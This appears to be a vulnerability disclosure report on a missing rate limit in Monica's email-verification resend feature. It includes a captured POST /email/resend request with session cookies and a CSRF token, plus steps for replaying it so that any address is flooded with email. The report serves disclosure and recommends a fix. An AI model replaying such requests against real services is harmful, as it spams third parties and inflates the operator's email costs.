monica

vulnerability business logic errors (cwe-840)
severity 8.8
language php
registry other

✍️ Description

Bypass rate limit and sent unlimited email to any email address.

🕵️‍♂️ Proof of Concept

During email verification resending there is not rate limit , which allow attacker to sent unlimited email to any mail address .

  1. First goto your account in monicahq and visit https://app.monicahq.com/settings . Here change the email address with victim email address like xyz@gmail.com .

Here user can sent another verification link by clicking "click here to request another".(check bellow attached image link) just click this link and capture the request in burp suite .Now email resending request look like bellow request

POST /email/resend HTTP/1.1
Host: app.monicahq.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: null
Connection: close
Cookie: __cfduid=d45dfa12b4cde7f49ebc02357f8a751861619252940; XSRF-TOKEN=eyJpdiI6Ild5Q1NWYWlxYnhmSzNsUGZ1bEZRS1E9PSIsInZhbHVlIjoiSURaeWZsUEt0dmJkY2kzYWlvWmFhOTk2SCtMQ0lUM2FvTWpnTDZUZHgvNEphZEI4dW0zbm56aDlmOS9aRHhVTHlqbm92RU1yM2FneXhTSENjRzdWNmRQVUE1ZFFBc01NNFU5VFcwOElWTWI0aFE5K0xiUkRmQnFhRE9rbUwxS1MiLCJtYWMiOiJjZmE1MTExODA3NWY0ZTM1ZGIyZTMzNDAwMWMwMDk1ODQzN2RmNjE0M2FjMjE4NWM1ZjA2NzE4M2E5Y2Y1ZTNlIn0%3D; laravel_session=eyJpdiI6Im1ZVnpJV2tUUkNBZVdYV21FckZwNnc9PSIsInZhbHVlIjoickFnV0JRaFd2MU1WeUZodVZzZGxmZlBLOWZhQXhhMmFJR1ZZTzVEdnd5a212V05GbDlBZ2hIVVVBSVFpZEREb3Z1STZDc1k1a21wQ3Y5cmxXeUZIbkNCK09iMWREVjJXVHFkZkh6OHB5WTJmaVhmRWxmSWVYdEFZM09wUGdjS2YiLCJtYWMiOiI4YjRkMjk0NmQwMGMxYzQxNjJiYzY4NmQ5MzRiNTFjNjUxYTQ5OTBkZDJhMjU1Y2U5ZDQwNjhiMGFiMmNkNTIwIn0%3D; laravel_token=eyJpdiI6IldQbTNwUVJWMk5DOEQrektmREk5amc9PSIsInZhbHVlIjoiOFNtSnZ0NXpibTYrc29YRytMUXEzZjQxMUV0VGlLOHo1dVhseGM3ZXcycHo1WUJQWWJGS1MvcEY3TGVnRjJvYkRxdHpoeXpYRGsySjRPUVNoaitzeVBLdXBMT3BDTWh3bzNWTGNMMS81QUc4NS9xakV2VG40clF4WngrQmV4Vmk0NG8yQUhPbVJ5TW5lRmJLOUpaNzlaaDVIbitHTWM1TjVPWkkrSm15ZHlYY0FyNHV0WDhNQ2liNklZRmYzOXVUYXVEeDJ5cHBwSW0zU0pjQkNNemJRWngyMHczdFlxMWFTWjB4b016c2RJd0Jlc1pWRVkyVzBhMWFTMWpCUlVxMFpIUklQU0c4WlI3VFcvdHJvTE96ektIMWRFMUpIQ2tNUEppSHFwVmNWNThEdUVCdEw3QXpzeTJwKzBCTGh5LzEiLCJtYWMiOiJmOWZmNWI5ZDM2ZGJiYzE1NjFiNjA5MWJlNzg2MDk5NjUzOGI5OTM4MGZiNGVjYTMzNDVlYmI2ZWE2Y2YyNDYzIn0%3D
Upgrade-Insecure-Requests: 1

_token=g3WkdnImU42bV9weoULD8CeMGrkRl9jAcw704reP

Now sent this request unlimited time and victim email address will received unlimited verification email . Also attacker can make this as python code and send unlimited email

You should set rate limit there to prevent this

💥 Impact

Attacker can sent unlimited email to any mail address . Many email service provider has limited email sending like 10000 email per month . If you exeed that limit then you will be extra charged . So, using this attack attacker can exeed that limit and company will be charged extra money.